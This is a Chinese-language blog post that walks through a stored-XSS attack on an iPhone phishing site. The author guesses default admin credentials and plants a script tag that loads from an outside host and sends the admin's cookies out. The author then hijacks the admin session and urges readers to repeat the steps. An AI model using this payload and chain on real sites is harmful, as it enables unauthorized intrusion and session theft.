XSS攻擊是什麼,怎麼秒殺iphone釣魚站
偷了我的iphone,開路虎給我送回來。 - 黑客生活 - 知乎專欄
這個文章結尾我說了一句,免費找手機。結果.......
被偷的並收到簡訊的還真不少,我他媽怎麼遇不上這種好事兒。
沒辦法,自己裝的逼,跪著也要裝完。
開始:
公眾號小夥伴發來的」他收到的釣魚站」(這是其中一種)
我靠,還不準進。也許是習慣,也許是手賤。試試admin、admin。於是....猜測他這個限制是位元組不夠。進來以後,我開開心心的點擊下一步就進入到了密保填寫頁面。
還沒來得及截圖,開開心心的創建XSS
我勒個去,你們猜發生了什麼,我,他,媽,還,沒,來,得,及,截,圖
就這樣無情的跳轉了(等於關閉站點)。 好吧,我服,可能是在嘗試登錄的過程中,釣魚團伙發現了有人在隨便輸入。於是猜測有人在嘗試滲透。於是就........
搜集資料去,居然還是QQ郵箱,加了QQ好友發現是個幾乎沒人用的號。
這哥們的QQ資料真是醉醉噠。
通過郵箱whois反差,得到以上域名~然並卵,全都無法訪問。好吧,這是個失敗的例子不要方,下面還有成功的↓
知乎某女迷妹發來的鏈接
小樣,還敢不讓我用pc訪問(其實釣魚團伙這樣設計這樣也是為了防止大家發現釣魚網站的域名有問題)安裝上圖中的插件並啟用,模擬訪問蘋果手機,訪問成功以後的界面是這樣的↓
這一次 我機智的使用了876585551, 而不是123等等來測試。擔心又被察覺。
這一次,我先把圖給截了,高潮的時候到了。
上圖中有幾個輸入框,這裡我們去XSS平台創建項目,並把xss payload(攻擊代碼)從這裡插入。XSS平台:http://xss.sssie.com
但我又機智的等了一下,先看看有沒有什麼限制之類的,萬一插不進?
可能到了這裡有人要問:為什麼前面輸入賬號密碼或者手機號的時候不插?
因為源代碼中限制了輸入的長度,不夠我們輸入攻擊代碼。當然,限制也分許多種,比如前端長度限制等等,以前寫過關於長度限制的繞過,但是地址你們沒有邀請碼訪問不進去。直接發圖給大家(圖片是以前我們在成功滲透時時彩網站時對XSS長度限制講解的一部分)
而這裡的長度限制我沒有仔細研究,也不想去麻煩。所以一直等到輸入密保問題這個地方再看看。
你看下圖↓
最大長度是32個位元組。(空格、字母、符號都算在其中)
一般的payload(攻擊代碼)確實不會超出這個長度。
但我們還需要注意,萬一又出現一個防禦:可能會過濾尖括弧等
這裡就懶得去講解怎麼繞過了,就是轉義轉碼等等技巧。
請百度:搜狐視頻儲存型XSS(過濾了尖括弧/圓括弧/單引號等字元下的利用技巧)
這裡我沒有這個防禦,所以我的攻擊代碼就很簡單。
<script src=http://xxxxx.cn/RciB7cG></script>
插入後提交,就坐等郵件的到來。管理員登錄後台的時候應該就會發送他登錄時生成的cookie(此時郵件沒來,我是邊寫邊日的站。然而我想一次寫完)
去郵箱找了一封十幾分鐘前XSS平台給我發的郵件內容包括:網站後台登錄地址、管理員登錄生成的cookies。
這個時候通過瀏覽器插件cookie hack修改自己的cookie
恩,大致內容就這樣吧。畢竟很多粉絲是小白,我只能講一些最基本的東西。
很多原理沒有一一解釋,很多難關我也沒提到,因為我講了,而你遇到了。也無法搞定。
所以如果你遇到蘋果釣魚網站的時候,按照我這個思路走一遍,看看能不能搞定,不能搞定再來私信我。互相交流~
全文完,求打賞夜宵
最後,這個月應該還會出一篇針對XSS的五千字講解。
相關係列:
你真的會SQL注入攻擊嗎?(下) - 黑客生活 - 知乎專欄
滲透測試,你真的會收集信息嗎? - 黑客生活 - 知乎專欄
希望大家能學習真正的知識~
2016/9/15 。 15:02分更新
兩圖勝千言
大家不要再私信了,我說的免費幫忙併不是每一個都幫。(微信+知乎超過三位數來求幫忙的了,天啦嚕,被盜手機的還真不少)這樣子我連覺都不要睡了。
怎麼操作已經寫在本文了,大家自行學習,知識才是最重要的。
推薦閱讀: